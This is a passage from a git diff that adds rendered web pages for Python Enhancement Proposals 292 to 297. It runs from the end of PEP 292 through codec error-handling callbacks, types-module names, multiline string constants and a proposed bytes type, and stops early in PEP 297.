It’s generally accepted that the rules in PEP 215 are safe in the +sense that they introduce no new security issues (see PEP 215, +“Security Issues” for details). However, the rules are still +quite complex, and make it more difficult to see the substitution +placeholder in the original $-string.

+

The interesting thing is that the Template class defined in this +PEP is designed for inheritance and, with a little extra work, +it’s possible to support PEP 215’s functionality using existing +Python syntax.

+

For example, one could define subclasses of Template and dict that +allowed for a more complex placeholder syntax and a mapping that +evaluated those placeholders.

+
+
+

Internationalization

+

The implementation supports internationalization by recording the +original template string in the Template instance’s template +attribute. This attribute would serve as the lookup key in an +gettext-based catalog. It is up to the application to turn the +resulting string back into a Template for substitution.

+

However, the Template class was designed to work more intuitively +in an internationalized application, by supporting the mixing-in +of Template and unicode subclasses. Thus an internationalized +application could create an application-specific subclass, +multiply inheriting from Template and unicode, and using instances +of that subclass as the gettext catalog key. Further, the +subclass could alias the special __mod__() method to either +.substitute() or .safe_substitute() to provide a more traditional +string/unicode like %-operator substitution syntax.

+
+
+

Reference Implementation

+

The implementation [4] has been committed to the Python 2.4 source tree.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0292.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0293/index.html b/pep-0293/index.html new file mode 100644 index 00000000000..69c791d818b --- /dev/null +++ b/pep-0293/index.html @@ -0,0 +1,511 @@ + + + + + + + + PEP 293 – Codec Error Handling Callbacks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 293 – Codec Error Handling Callbacks

+
+
Author:
+
Walter Dörwald <walter at livinglogic.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-Jun-2002
+
Python-Version:
+
2.3
+
Post-History:
+
19-Jun-2002
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP aims at extending Python’s fixed codec error handling +schemes with a more flexible callback based approach.

+

Python currently uses a fixed error handling for codec error +handlers. This PEP describes a mechanism which allows Python to +use function callbacks as error handlers. With these more +flexible error handlers it is possible to add new functionality to +existing codecs by e.g. providing fallback solutions or different +encodings for cases where the standard codec mapping does not +apply.

+
+
+

Specification

+

Currently the set of codec error handling algorithms is fixed to +either “strict”, “replace” or “ignore” and the semantics of these +algorithms is implemented separately for each codec.

+

The proposed patch will make the set of error handling algorithms +extensible through a codec error handler registry which maps +handler names to handler functions. This registry consists of the +following two C functions:

+
int PyCodec_RegisterError(const char *name, PyObject *error)
+
+PyObject *PyCodec_LookupError(const char *name)
+
+
+

and their Python counterparts:

+
codecs.register_error(name, error)
+
+codecs.lookup_error(name)
+
+
+

PyCodec_LookupError raises a LookupError if no callback function +has been registered under this name.

+

Similar to the encoding name registry there is no way of +unregistering callback functions or iterating through the +available functions.

+

The callback functions will be used in the following way by the +codecs: when the codec encounters an encoding/decoding error, the +callback function is looked up by name, the information about the +error is stored in an exception object and the callback is called +with this object. The callback returns information about how to +proceed (or raises an exception).

+

For encoding, the exception object will look like this:

+
class UnicodeEncodeError(UnicodeError):
+    def __init__(self, encoding, object, start, end, reason):
+        UnicodeError.__init__(self,
+            "encoding '%s' can't encode characters " +
+            "in positions %d-%d: %s" % (encoding,
+                start, end-1, reason))
+        self.encoding = encoding
+        self.object = object
+        self.start = start
+        self.end = end
+        self.reason = reason
+
+
+

This type will be implemented in C with the appropriate setter and +getter methods for the attributes, which have the following +meaning:

+
    +
  • encoding: The name of the encoding;
  • +
  • object: The original unicode object for which encode() has +been called;
  • +
  • start: The position of the first unencodable character;
  • +
  • end: (The position of the last unencodable character)+1 (or +the length of object, if all characters from start to the end +of object are unencodable);
  • +
  • reason: The reason why object[start:end] couldn’t be encoded.
  • +
+

If object has consecutive unencodable characters, the encoder +should collect those characters for one call to the callback if +those characters can’t be encoded for the same reason. The +encoder is not required to implement this behaviour but may call +the callback for every single character, but it is strongly +suggested that the collecting method is implemented.

+

The callback must not modify the exception object. If the +callback does not raise an exception (either the one passed in, or +a different one), it must return a tuple:

+
(replacement, newpos)
+
+
+

replacement is a unicode object that the encoder will encode and +emit instead of the unencodable object[start:end] part, newpos +specifies a new position within object, where (after encoding the +replacement) the encoder will continue encoding.

+

Negative values for newpos are treated as being relative to +end of object. If newpos is out of bounds the encoder will raise +an IndexError.

+

If the replacement string itself contains an unencodable character +the encoder raises the exception object (but may set a different +reason string before raising).

+

Should further encoding errors occur, the encoder is allowed to +reuse the exception object for the next call to the callback. +Furthermore, the encoder is allowed to cache the result of +codecs.lookup_error.

+

If the callback does not know how to handle the exception, it must +raise a TypeError.

+

Decoding works similar to encoding with the following differences:

+
    +
  • The exception class is named UnicodeDecodeError and the attribute +object is the original 8bit string that the decoder is currently +decoding.
  • +
  • The decoder will call the callback with those bytes that +constitute one undecodable sequence, even if there is more than +one undecodable sequence that is undecodable for the same reason +directly after the first one. E.g. for the “unicode-escape” +encoding, when decoding the illegal string \\u00\\u01x, the +callback will be called twice (once for \\u00 and once for +\\u01). This is done to be able to generate the correct number +of replacement characters.
  • +
  • The replacement returned from the callback is a unicode object +that will be emitted by the decoder as-is without further +processing instead of the undecodable object[start:end] part.
  • +
+

There is a third API that uses the old strict/ignore/replace error +handling scheme:

+
PyUnicode_TranslateCharmap/unicode.translate
+
+
+

The proposed patch will enhance PyUnicode_TranslateCharmap, so +that it also supports the callback registry. This has the +additional side effect that PyUnicode_TranslateCharmap will +support multi-character replacement strings (see SF feature +request #403100 [1]).

+

For PyUnicode_TranslateCharmap the exception class will be named +UnicodeTranslateError. PyUnicode_TranslateCharmap will collect +all consecutive untranslatable characters (i.e. those that map to +None) and call the callback with them. The replacement returned +from the callback is a unicode object that will be put in the +translated result as-is, without further processing.

+

All encoders and decoders are allowed to implement the callback +functionality themselves, if they recognize the callback name +(i.e. if it is a system callback like “strict”, “replace” and +“ignore”). The proposed patch will add two additional system +callback names: “backslashreplace” and “xmlcharrefreplace”, which +can be used for encoding and translating and which will also be +implemented in-place for all encoders and +PyUnicode_TranslateCharmap.

+

The Python equivalent of these five callbacks will look like this:

+
def strict(exc):
+    raise exc
+
+def ignore(exc):
+    if isinstance(exc, UnicodeError):
+        return (u"", exc.end)
+    else:
+        raise TypeError("can't handle %s" % exc.__name__)
+
+def replace(exc):
+     if isinstance(exc, UnicodeEncodeError):
+         return ((exc.end-exc.start)*u"?", exc.end)
+     elif isinstance(exc, UnicodeDecodeError):
+         return (u"\\ufffd", exc.end)
+     elif isinstance(exc, UnicodeTranslateError):
+         return ((exc.end-exc.start)*u"\\ufffd", exc.end)
+     else:
+         raise TypeError("can't handle %s" % exc.__name__)
+
+def backslashreplace(exc):
+     if isinstance(exc,
+         (UnicodeEncodeError, UnicodeTranslateError)):
+         s = u""
+         for c in exc.object[exc.start:exc.end]:
+            if ord(c)<=0xff:
+                s += u"\\x%02x" % ord(c)
+            elif ord(c)<=0xffff:
+                s += u"\\u%04x" % ord(c)
+            else:
+                s += u"\\U%08x" % ord(c)
+         return (s, exc.end)
+     else:
+         raise TypeError("can't handle %s" % exc.__name__)
+
+def xmlcharrefreplace(exc):
+     if isinstance(exc,
+         (UnicodeEncodeError, UnicodeTranslateError)):
+         s = u""
+         for c in exc.object[exc.start:exc.end]:
+            s += u"&#%d;" % ord(c)
+         return (s, exc.end)
+     else:
+         raise TypeError("can't handle %s" % exc.__name__)
+
+
+

These five callback handlers will also be accessible to Python as +codecs.strict_error, codecs.ignore_error, codecs.replace_error, +codecs.backslashreplace_error and codecs.xmlcharrefreplace_error.

+
+
+

Rationale

+

Most legacy encoding do not support the full range of Unicode +characters. For these cases many high level protocols support a +way of escaping a Unicode character (e.g. Python itself supports +the \x, \u and \U convention, XML supports character references +via &#xxx; etc.).

+

When implementing such an encoding algorithm, a problem with the +current implementation of the encode method of Unicode objects +becomes apparent: For determining which characters are unencodable +by a certain encoding, every single character has to be tried, +because encode does not provide any information about the location +of the error(s), so

+
# (1)
+us = u"xxx"
+s = us.encode(encoding)
+
+
+

has to be replaced by

+
# (2)
+us = u"xxx"
+v = []
+for c in us:
+    try:
+        v.append(c.encode(encoding))
+    except UnicodeError:
+        v.append("&#%d;" % ord(c))
+s = "".join(v)
+
+
+

This slows down encoding dramatically as now the loop through the +string is done in Python code and no longer in C code.

+

Furthermore, this solution poses problems with stateful encodings. +For example, UTF-16 uses a Byte Order Mark at the start of the +encoded byte string to specify the byte order. Using (2) with +UTF-16, results in an 8 bit string with a BOM between every +character.

+

To work around this problem, a stream writer - which keeps state +between calls to the encoding function - has to be used:

+
# (3)
+us = u"xxx"
+import codecs, cStringIO as StringIO
+writer = codecs.getwriter(encoding)
+
+v = StringIO.StringIO()
+uv = writer(v)
+for c in us:
+    try:
+        uv.write(c)
+    except UnicodeError:
+        uv.write(u"&#%d;" % ord(c))
+s = v.getvalue()
+
+
+

To compare the speed of (1) and (3) the following test script has +been used:

+
# (4)
+import time
+us = u"äa"*1000000
+encoding = "ascii"
+import codecs, cStringIO as StringIO
+
+t1 = time.time()
+
+s1 = us.encode(encoding, "replace")
+
+t2 = time.time()
+
+writer = codecs.getwriter(encoding)
+
+v = StringIO.StringIO()
+uv = writer(v)
+for c in us:
+    try:
+        uv.write(c)
+    except UnicodeError:
+        uv.write(u"?")
+s2 = v.getvalue()
+
+t3 = time.time()
+
+assert(s1==s2)
+print "1:", t2-t1
+print "2:", t3-t2
+print "factor:", (t3-t2)/(t2-t1)
+
+
+

On Linux this gives the following output (with Python 2.3a0):

+
1: 0.274321913719
+2: 51.1284689903
+factor: 186.381278466
+
+
+

i.e. (3) is 180 times slower than (1).

+

Callbacks must be stateless, because as soon as a callback is +registered it is available globally and can be called by multiple +encode() calls. To be able to use stateful callbacks, the errors +parameter for encode/decode/translate would have to be changed +from char * to PyObject *, so that the callback could be used +directly, without the need to register the callback globally. As +this requires changes to lots of C prototypes, this approach was +rejected.

+

Currently all encoding/decoding functions have arguments

+
const Py_UNICODE *p, int size
+
+
+

or

+
const char *p, int size
+
+
+

to specify the unicode characters/8bit characters to be +encoded/decoded. So in case of an error the codec has to create a +new unicode or str object from these parameters and store it in +the exception object. The callers of these encoding/decoding +functions extract these parameters from str/unicode objects +themselves most of the time, so it could speed up error handling +if these object were passed directly. As this again requires +changes to many C functions, this approach has been rejected.

+

For stream readers/writers the errors attribute must be changeable +to be able to switch between different error handling methods +during the lifetime of the stream reader/writer. This is currently +the case for codecs.StreamReader and codecs.StreamWriter and +all their subclasses. All core codecs and probably most of the +third party codecs (e.g. JapaneseCodecs) derive their stream +readers/writers from these classes so this already works, +but the attribute errors should be documented as a requirement.

+
+
+

Implementation Notes

+

A sample implementation is available as SourceForge patch #432401 +[2] including a script for testing the speed of various +string/encoding/error combinations and a test script.

+

Currently the new exception classes are old style Python +classes. This means that accessing attributes results +in a dict lookup. The C API is implemented in a way +that makes it possible to switch to new style classes +behind the scene, if Exception (and UnicodeError) will +be changed to new style classes implemented in C for +improved performance.

+

The class codecs.StreamReaderWriter uses the errors parameter for +both reading and writing. To be more flexible this should +probably be changed to two separate parameters for reading and +writing.

+

The errors parameter of PyUnicode_TranslateCharmap is not +availably to Python, which makes testing of the new functionality +of PyUnicode_TranslateCharmap impossible with Python scripts. The +patch should add an optional argument errors to unicode.translate +to expose the functionality and make testing possible.

+

Codecs that do something different than encoding/decoding from/to +unicode and want to use the new machinery can define their own +exception classes and the strict handlers will automatically work +with it. The other predefined error handlers are unicode specific +and expect to get a Unicode(Encode|Decode|Translate)Error +exception object so they won’t work.

+
+
+

Backwards Compatibility

+

The semantics of unicode.encode with errors=”replace” has changed: +The old version always stored a ? character in the output string +even if no character was mapped to ? in the mapping. With the +proposed patch, the replacement string from the callback will +again be looked up in the mapping dictionary. But as all +supported encodings are ASCII based, and thus map ? to ?, this +should not be a problem in practice.

+

Illegal values for the errors argument raised ValueError before, +now they will raise LookupError.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0293.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0294/index.html b/pep-0294/index.html new file mode 100644 index 00000000000..c44e3d85035 --- /dev/null +++ b/pep-0294/index.html @@ -0,0 +1,208 @@ + + + + + + + + PEP 294 – Type Names in the types Module | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 294 – Type Names in the types Module

+
+
Author:
+
Oren Tirosh <oren at hishome.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
19-Jun-2002
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes that symbols matching the type name should be added +to the types module for all basic Python types in the types module:

+
types.IntegerType -> types.int
+types.FunctionType -> types.function
+types.TracebackType -> types.traceback
+ ...
+
+
+

The long capitalized names currently in the types module will be +deprecated.

+

With this change the types module can serve as a replacement for the +new module. The new module shall be deprecated and listed in PEP 4.

+
+
+

Pronouncement

+

A centralized repository of type names was a mistake. Neither the +“types” nor “new” modules should be carried forward to Python 3.0.

+

In the meantime, it does not make sense to make the proposed updates +to the modules. This would cause disruption without any compensating +benefit.

+

Instead, the problem that some internal types (frames, functions, +etc.) don’t live anywhere outside those modules may be addressed by +either adding them to __builtin__ or sys. This will provide a +smoother transition to Python 3.0.

+
+
+

Rationale

+

Using two sets of names for the same objects is redundant and +confusing.

+

In Python versions prior to 2.2 the symbols matching many type names +were taken by the factory functions for those types. Now all basic +types have been unified with their factory functions and therefore the +type names are available to be consistently used to refer to the type +object.

+

Most types are accessible as either builtins or in the new module but +some types such as traceback and generator are only accessible through +the types module under names which do not match the type name. This +PEP provides a uniform way to access all basic types under a single +set of names.

+
+
+

Specification

+

The types module shall pass the following test:

+
import types
+for t in vars(types).values():
+    if type(t) is type:
+assert getattr(types, t.__name__) is t
+
+
+

The types ‘class’, ‘instance method’ and ‘dict-proxy’ have already +been renamed to the valid Python identifiers ‘classobj’, +‘instancemethod’ and ‘dictproxy’, making this possible.

+
+
+

Backward compatibility

+

Because of their widespread use it is not planned to actually remove +the long names from the types module in some future version. However, +the long names should be changed in documentation and library sources +to discourage their use in new code.

+
+
+

Reference Implementation

+

A reference implementation is available in +issue #569328.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0294.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0295/index.html b/pep-0295/index.html new file mode 100644 index 00000000000..2b755c06fe6 --- /dev/null +++ b/pep-0295/index.html @@ -0,0 +1,231 @@ + + + + + + + + PEP 295 – Interpretation of multiline string constants | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 295 – Interpretation of multiline string constants

+
+
Author:
+
Stepan Koltsov <yozh at mx1.ru>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
22-Jul-2002
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes an interpretation of multiline string constants +for Python. It suggests stripping spaces after newlines and +stripping a newline if it is first character after an opening +quotation.

+
+
+

Rationale

+

This PEP proposes an interpretation of multiline string constants +in Python. Currently, the value of string constant is all the +text between quotations, maybe with escape sequences substituted, +e.g.:

+
def f():
+    """
+    la-la-la
+    limona, banana
+    """
+
+def g():
+    return "This is \
+    string"
+
+print repr(f.__doc__)
+print repr(g())
+
+
+

prints:

+
'\n\tla-la-la\n\tlimona, banana\n\t'
+'This is \tstring'
+
+
+

This PEP suggest two things:

+
    +
  • ignore the first character after opening quotation, if it is +newline
  • +
  • ignore in string constants all spaces and tabs up to +first non-whitespace character, but no more than current +indentation.
  • +
+

After applying this, previous program will print:

+
'la-la-la\nlimona, banana\n'
+'This is string'
+
+
+

To get this result, previous programs could be rewritten for +current Python as (note, this gives the same result with new +strings meaning):

+
def f():
+    """\
+la-la-la
+limona, banana
+"""
+
+def g():
+  "This is \
+string"
+
+
+

Or stripping can be done with library routines at runtime (as +pydoc does), but this decreases program readability.

+
+
+

Implementation

+

I’ll say nothing about CPython, Jython or Python.NET.

+

In original Python, there is no info about the current indentation +(in spaces) at compile time, so space and tab stripping should be +done at parse time. Currently no flags can be passed to the +parser in program text (like from __future__ import xxx). I +suggest enabling or disabling of this feature at Python compile +time depending of CPP flag Py_PARSE_MULTILINE_STRINGS.

+
+
+

Alternatives

+

New interpretation of string constants can be implemented with flags +‘i’ and ‘o’ to string constants, like:

+
i"""
+SELECT * FROM car
+WHERE model = 'i525'
+""" is in new style,
+
+o"""SELECT * FROM employee
+WHERE birth < 1982
+""" is in old style, and
+
+"""
+SELECT employee.name, car.name, car.price FROM employee, car
+WHERE employee.salary * 36 > car.price
+""" is in new style after Python-x.y.z and in old style otherwise.
+
+
+

Also this feature can be disabled if string is raw, i.e. if flag ‘r’ +specified.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0295.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0296/index.html b/pep-0296/index.html new file mode 100644 index 00000000000..4113926d36b --- /dev/null +++ b/pep-0296/index.html @@ -0,0 +1,440 @@ + + + + + + + + PEP 296 – Adding a bytes Object Type | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 296 – Adding a bytes Object Type

+
+
Author:
+
Scott Gilbert <xscottg at yahoo.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
12-Jul-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Notice

+

This PEP is withdrawn by the author (in favor of PEP 358).

+
+
+

Abstract

+

This PEP proposes the creation of a new standard type and builtin +constructor called ‘bytes’. The bytes object is an efficiently +stored array of bytes with some additional characteristics that +set it apart from several implementations that are similar.

+
+
+

Rationale

+

Python currently has many objects that implement something akin to +the bytes object of this proposal. For instance the standard +string, buffer, array, and mmap objects are all very similar in +some regards to the bytes object. Additionally, several +significant third party extensions have created similar objects to +try and fill similar needs. Frustratingly, each of these objects +is too narrow in scope and is missing critical features to make it +applicable to a wider category of problems.

+
+
+

Specification

+

The bytes object has the following important characteristics:

+
    +
  1. Efficient underlying array storage via the standard C type “unsigned +char”. This allows fine grain control over how much memory is +allocated. With the alignment restrictions designated in the next +item, it is trivial for low level extensions to cast the pointer +to a different type as needed.

    Also, since the object is implemented as an array of bytes, it is +possible to pass the bytes object to the extensive library of +routines already in the standard library that presently work with +strings. For instance, the bytes object in conjunction with the +struct module could be used to provide a complete replacement for +the array module using only Python script.

    +

    If an unusual platform comes to light, one where there isn’t a +native unsigned 8 bit type, the object will do its best to +represent itself at the Python script level as though it were an +array of 8 bit unsigned values. It is doubtful whether many +extensions would handle this correctly, but Python script could be +portable in these cases.

    +
  2. +
  3. Alignment of the allocated byte array is whatever is promised by the +platform implementation of malloc. A bytes object created from an +extension can be supplied that provides any arbitrary alignment as +the extension author sees fit.

    This alignment restriction should allow the bytes object to be +used as storage for all standard C types - including PyComplex +objects or other structs of standard C type types. Further +alignment restrictions can be provided by extensions as necessary.

    +
  4. +
  5. The bytes object implements a subset of the sequence operations +provided by string/array objects, but with slightly different +semantics in some cases. In particular, a slice always returns a +new bytes object, but the underlying memory is shared between the +two objects. This type of slice behavior has been called creating +a “view”. Additionally, repetition and concatenation are +undefined for bytes objects and will raise an exception.

    As these objects are likely to find use in high performance +applications, one motivation for the decision to use view slicing +is that copying between bytes objects should be very efficient and +not require the creation of temporary objects. The following code +illustrates this:

    +
    # create two 10 Meg bytes objects
    +b1 = bytes(10000000)
    +b2 = bytes(10000000)
    +
    +# copy from part of one to another with out creating a 1 Meg temporary
    +b1[2000000:3000000] = b2[4000000:5000000]
    +
    +
    +

    Slice assignment where the rvalue is not the same length as the +lvalue will raise an exception. However, slice assignment will +work correctly with overlapping slices (typically implemented with +memmove).

    +
  6. +
  7. The bytes object will be recognized as a native type by the pickle and +cPickle modules for efficient serialization. (In truth, this is +the only requirement that can’t be implemented via a third party +extension.)

    Partial solutions to address the need to serialize the data stored +in a bytes-like object without creating a temporary copy of the +data into a string have been implemented in the past. The tofile +and fromfile methods of the array object are good examples of +this. The bytes object will support these methods too. However, +pickling is useful in other situations - such as in the shelve +module, or implementing RPC of Python objects, and requiring the +end user to use two different serialization mechanisms to get an +efficient transfer of data is undesirable.

    +

    XXX: Will try to implement pickling of the new bytes object in +such a way that previous versions of Python will unpickle it as a +string object.

    +

    When unpickling, the bytes object will be created from memory +allocated from Python (via malloc). As such, it will lose any +additional properties that an extension supplied pointer might +have provided (special alignment, or special types of memory).

    +

    XXX: Will try to make it so that C subclasses of bytes type can +supply the memory that will be unpickled into. For instance, a +derived class called PageAlignedBytes would unpickle to memory +that is also page aligned.

    +

    On any platform where an int is 32 bits (most of them), it is +currently impossible to create a string with a length larger than +can be represented in 31 bits. As such, pickling to a string will +raise an exception when the operation is not possible.

    +

    At least on platforms supporting large files (many of them), +pickling large bytes objects to files should be possible via +repeated calls to the file.write() method.

    +
  8. +
  9. The bytes type supports the PyBufferProcs interface, but a bytes object +provides the additional guarantee that the pointer will not be +deallocated or reallocated as long as a reference to the bytes +object is held. This implies that a bytes object is not resizable +once it is created, but allows the global interpreter lock (GIL) +to be released while a separate thread manipulates the memory +pointed to if the PyBytes_Check(...) test passes.

    This characteristic of the bytes object allows it to be used in +situations such as asynchronous file I/O or on multiprocessor +machines where the pointer obtained by PyBufferProcs will be used +independently of the global interpreter lock.

    +

    Knowing that the pointer can not be reallocated or freed after the +GIL is released gives extension authors the capability to get true +concurrency and make use of additional processors for long running +computations on the pointer.

    +
  10. +
  11. In C/C++ extensions, the bytes object can be created from a supplied +pointer and destructor function to free the memory when the +reference count goes to zero.

    The special implementation of slicing for the bytes object allows +multiple bytes objects to refer to the same pointer/destructor. +As such, a refcount will be kept on the actual +pointer/destructor. This refcount is separate from the refcount +typically associated with Python objects.

    +

    XXX: It may be desirable to expose the inner refcounted object as an +actual Python object. If a good use case arises, it should be possible +for this to be implemented later with no loss to backwards compatibility.

    +
  12. +
  13. It is also possible to signify the bytes object as readonly, in this +case it isn’t actually mutable, but does provide the other features of a +bytes object.
  14. +
  15. The bytes object keeps track of the length of its data with a Python +LONG_LONG type. Even though the current definition for PyBufferProcs +restricts the length to be the size of an int, this PEP does not propose +to make any changes there. Instead, extensions can work around this limit +by making an explicit PyBytes_Check(...) call, and if that succeeds they +can make a PyBytes_GetReadBuffer(...) or PyBytes_GetWriteBuffer +call to get the pointer and full length of the object as a LONG_LONG.

    The bytes object will raise an exception if the standard PyBufferProcs +mechanism is used and the size of the bytes object is greater than can be +represented by an integer.

    +

    From Python scripting, the bytes object will be subscriptable with longs +so the 32 bit int limit can be avoided.

    +

    There is still a problem with the len() function as it is +PyObject_Size() and this returns an int as well. As a workaround, +the bytes object will provide a .length() method that will return a long.

    +
  16. +
  17. The bytes object can be constructed at the Python scripting level by +passing an int/long to the bytes constructor with the number of bytes to +allocate. For example:
    b = bytes(100000) # alloc 100K bytes
    +
    +
    +

    The constructor can also take another bytes object. This will be useful +for the implementation of unpickling, and in converting a read-write bytes +object into a read-only one. An optional second argument will be used to +designate creation of a readonly bytes object.

    +
  18. +
  19. From the C API, the bytes object can be allocated using any of the +following signatures:
    PyObject* PyBytes_FromLength(LONG_LONG len, int readonly);
    +PyObject* PyBytes_FromPointer(void* ptr, LONG_LONG len, int readonly
    +         void (*dest)(void *ptr, void *user), void* user);
    +
    +
    +

    In the PyBytes_FromPointer(...) function, if the dest function pointer +is passed in as NULL, it will not be called. This should only be used +for creating bytes objects from statically allocated space.

    +

    The user pointer has been called a closure in other places. It is a +pointer that the user can use for whatever purposes. It will be passed to +the destructor function on cleanup and can be useful for a number of +things. If the user pointer is not needed, NULL should be passed +instead.

    +
  20. +
  21. The bytes type will be a new style class as that seems to be where all +standard Python types are headed.
  22. +
+
+
+

Contrast to existing types

+

The most common way to work around the lack of a bytes object has been to +simply use a string object in its place. Binary files, the struct/array +modules, and several other examples exist of this. Putting aside the +style issue that these uses typically have nothing to do with text +strings, there is the real problem that strings are not mutable, so direct +manipulation of the data returned in these cases is not possible. Also, +numerous optimizations in the string module (such as caching the hash +value or interning the pointers) mean that extension authors are on very +thin ice if they try to break the rules with the string object.

+

The buffer object seems like it was intended to address the purpose that +the bytes object is trying fulfill, but several shortcomings in its +implementation [1] have made it less useful in many common cases. The +buffer object made a different choice for its slicing behavior (it returns +new strings instead of buffers for slicing and other operations), and it +doesn’t make many of the promises on alignment or being able to release +the GIL that the bytes object does.

+

Also in regards to the buffer object, it is not possible to simply replace +the buffer object with the bytes object and maintain backwards +compatibility. The buffer object provides a mechanism to take the +PyBufferProcs supplied pointer of another object and present it as its +own. Since the behavior of the other object can not be guaranteed to +follow the same set of strict rules that a bytes object does, it can’t be +used in places that a bytes object could.

+

The array module supports the creation of an array of bytes, but it does +not provide a C API for supplying pointers and destructors to extension +supplied memory. This makes it unusable for constructing objects out of +shared memory, or memory that has special alignment or locking for things +like DMA transfers. Also, the array object does not currently pickle. +Finally since the array object allows its contents to grow, via the extend +method, the pointer can be changed if the GIL is not held while using it.

+

Creating a buffer object from an array object has the same problem of +leaving an invalid pointer when the array object is resized.

+

The mmap object caters to its particular niche, but does not attempt to +solve a wider class of problems.

+

Finally, any third party extension can not implement pickling without +creating a temporary object of a standard Python type. For example, in the +Numeric community, it is unpleasant that a large array can’t pickle +without creating a large binary string to duplicate the array data.

+
+
+

Backward Compatibility

+

The only possibility for backwards compatibility problems that the author +is aware of are in previous versions of Python that try to unpickle data +containing the new bytes type.

+
+
+

Reference Implementation

+

XXX: Actual implementation is in progress, but changes are still possible +as this PEP gets further review.

+

The following new files will be added to the Python baseline:

+
Include/bytesobject.h  # C interface
+Objects/bytesobject.c  # C implementation
+Lib/test/test_bytes.py # unit testing
+Doc/lib/libbytes.tex   # documentation
+
+
+

The following files will also be modified:

+
Include/Python.h       # adding bytesmodule.h include file
+Python/bltinmodule.c   # adding the bytes type object
+Modules/cPickle.c      # adding bytes to the standard types
+Lib/pickle.py          # adding bytes to the standard types
+
+
+

It is possible that several other modules could be cleaned up and +implemented in terms of the bytes object. The mmap module comes to mind +first, but as noted above it would be possible to reimplement the array +module as a pure Python module. While it is attractive that this PEP +could actually reduce the amount of source code by some amount, the author +feels that this could cause unnecessary risk for breaking existing +applications and should be avoided at this time.

+
+
+

Additional Notes/Comments

+
    +
  • Guido van Rossum wondered whether it would make sense to be able +to create a bytes object from a mmap object. The mmap object +appears to support the requirements necessary to provide memory +for a bytes object. (It doesn’t resize, and the pointer is valid +for the lifetime of the object.) As such, a method could be added +to the mmap module such that a bytes object could be created +directly from a mmap object. An initial stab at how this would be +implemented would be to use the PyBytes_FromPointer() function +described above and pass the mmap_object as the user pointer. The +destructor function would decref the mmap_object for cleanup.
  • +
  • Todd Miller notes that it may be useful to have two new functions: +PyObject_AsLargeReadBuffer() and PyObject_AsLargeWriteBuffer that are +similar to PyObject_AsReadBuffer() and PyObject_AsWriteBuffer(), but +support getting a LONG_LONG length in addition to the void* pointer. +These functions would allow extension authors to work transparently with +bytes object (that support LONG_LONG lengths) and most other buffer like +objects (which only support int lengths). These functions could be in +lieu of, or in addition to, creating a specific PyByte_GetReadBuffer() and +PyBytes_GetWriteBuffer() functions.

    XXX: The author thinks this is very a good idea as it paves the way for +other objects to eventually support large (64 bit) pointers, and it should +only affect abstract.c and abstract.h. Should this be added above?

    +
  • +
  • It was generally agreed that abusing the segment count of the +PyBufferProcs interface is not a good hack to work around the 31 bit +limitation of the length. If you don’t know what this means, then you’re +in good company. Most code in the Python baseline, and presumably in many +third party extensions, punt when the segment count is not 1.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0296.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0297/index.html b/pep-0297/index.html new file mode 100644 index 00000000000..b6ec9088398 --- /dev/null +++ b/pep-0297/index.html @@ -0,0 +1,221 @@ + + + + + + + + PEP 297 – Support for System Upgrades | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 297 – Support for System Upgrades

+
+
Author:
+
Marc-André Lemburg <mal at lemburg.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
19-Jul-2001
+
Python-Version:
+
2.6
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP is rejected for failure to generate significant interest.

+
+
+

Abstract

+

This PEP proposes strategies to allow the Python standard library +to be upgraded in parts without having to reinstall the complete +distribution or having to wait for a new patch level release.

+
+
+

Problem

+

Python currently does not allow overriding modules or packages in +the standard library per default. Even though this is possible by +defining a PYTHONPATH environment variable (the paths defined in +this variable are prepended to the Python standard library path), +there is no standard way of achieving this without changing the +configuration.

+

